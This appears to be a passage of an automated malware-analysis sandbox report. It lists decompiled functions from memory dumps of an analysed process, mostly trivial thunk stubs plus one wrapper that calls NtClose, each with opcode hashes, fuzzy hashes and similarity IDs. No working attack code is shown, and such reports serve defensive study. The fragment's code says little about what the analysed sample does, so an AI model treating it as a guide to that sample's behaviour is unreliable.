                                                                                                                                                        • Opcode Fuzzy Hash: c1018387def85eeed92f59d50137b54cc45b6d41c7f080cf34bb8c5060453614
                                                                                                                                                        • Instruction Fuzzy Hash: 01E08CB6641214AFD720DBA8CC85EDB7B68EF553A0F194599F95DAB242C130A5008BA0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00419E90, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E00419E90(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041A960(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                                                                                                                        0x00419e93
                                                                                                                                                        0x00419e96
                                                                                                                                                        0x00419e9f
                                                                                                                                                        0x00419ea7
                                                                                                                                                        0x00419eb5
                                                                                                                                                        0x00419eb9

                                                                                                                                                        APIs
                                                                                                                                                        • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Close
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3535843008-0
                                                                                                                                                        • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                        • Instruction ID: e68336ecf97fcbff1cce52d5eab911d0c0d253976a6ab71543f56f2ca0e2158f
                                                                                                                                                        • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                        • Instruction Fuzzy Hash: 6CD012752002146BD710EB99CC85ED7776CEF44760F154459BA5C5B242C530F55086E0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008C00C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                        • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                                                                                        • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                        • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008C0048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                                                                        • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                                                                                                                        • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                                                                        • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008C0078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                                                                        • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                                                                                                                        • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                                                                        • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008BF9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                        • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                                                                                        • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                        • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008BF900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                        • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                                                                                        • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                        • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008BFAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                        • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                                                                                        • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                        • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008BFAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                        • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                                                                                        • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                        • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008BFBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                        • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                                                                                                        • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                        • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008BFB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                        • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                                                                        • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                        • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008BFC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                                                                        • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                                                                                                                        • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                                                                        • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008BFC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                        • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                                                                                        • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                        • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008BFD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                        • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                                                                                        • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                        • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008BFDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                        • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                                                                                        • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                        • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008BFEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                                                                        • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                                                                                                                        • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                                                                        • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008BFED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                        • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                                                                                        • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                        • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

